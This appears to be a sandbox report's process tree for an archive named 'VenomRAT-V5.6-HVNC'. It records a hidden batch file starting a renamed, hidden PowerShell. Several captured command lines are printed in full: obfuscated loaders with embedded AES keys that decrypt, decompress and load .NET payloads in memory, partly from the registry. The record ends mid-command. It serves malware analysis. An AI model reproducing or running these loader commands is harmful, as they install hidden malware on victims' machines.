    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:1
    3⤵
    PID:1236
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1832 /prefetch:1
    3⤵
    PID:4848
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5176 /prefetch:2
    3⤵
    PID:6768
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
    3⤵
    PID:6032
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2716 /prefetch:1
    3⤵
    PID:6336
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:1
    3⤵
    PID:6640
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6476 /prefetch:1
    3⤵
    PID:4816
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6376 /prefetch:8
    3⤵
    PID:3460
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6292 /prefetch:8
    3⤵
    PID:6844
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1908 /prefetch:1
    3⤵
    PID:5324
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
    3⤵
    PID:6172
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap521:98:7zEvent19607
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2180
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\VenomRAT-V5.6-HVNC\" -ad -an -ai#7zMap22093:98:7zEvent25346
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4924
- C:\Users\Admin\Downloads\VenomRAT-V5.6-HVNC\Venom RAT + HVNC.exe
  "C:\Users\Admin\Downloads\VenomRAT-V5.6-HVNC\Venom RAT + HVNC.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:3192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\VenomRAT-V5.6-HVNC\Stub\ClientFix.bat" "
    3⤵
    PID:4684
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1788
  - - C:\Users\Admin\Downloads\VenomRAT-V5.6-HVNC\Stub\ClientFix.bat.exe
      "ClientFix.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $WFMJi = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\VenomRAT-V5.6-HVNC\Stub\ClientFix.bat').Split([Environment]::NewLine);foreach ($CfaZq in $WFMJi) { if ($CfaZq.StartsWith(':: ')) { $vvycE = $CfaZq.Substring(3); break; }; };$ebOVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($vvycE);$TvyrY = New-Object System.Security.Cryptography.AesManaged;$TvyrY.Mode = [System.Security.Cryptography.CipherMode]::CBC;$TvyrY.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$TvyrY.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kAdRfGjG5nQ73DzFMdGHAl3pY8gtBNZSc1HkWv4kVjQ=');$TvyrY.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XfTHUmFJqIl6NYYRvVi6Uw==');$iolsF = $TvyrY.CreateDecryptor();$ebOVF = $iolsF.TransformFinalBlock($ebOVF, 0, $ebOVF.Length);$iolsF.Dispose();$TvyrY.Dispose();$xwvRO = New-Object System.IO.MemoryStream(, $ebOVF);$KUalT = New-Object System.IO.MemoryStream;$sthnm = New-Object System.IO.Compression.GZipStream($xwvRO, [IO.Compression.CompressionMode]::Decompress);$sthnm.CopyTo($KUalT);$sthnm.Dispose();$xwvRO.Dispose();$KUalT.Dispose();$ebOVF = $KUalT.ToArray();$KGzdp = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($ebOVF);$OfYbS = $KGzdp.EntryPoint;$OfYbS.Invoke($null, (, [string[]] ('')))
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1132
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Checks computer location settings
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4424
      - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4424).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1608
      - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4424).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join 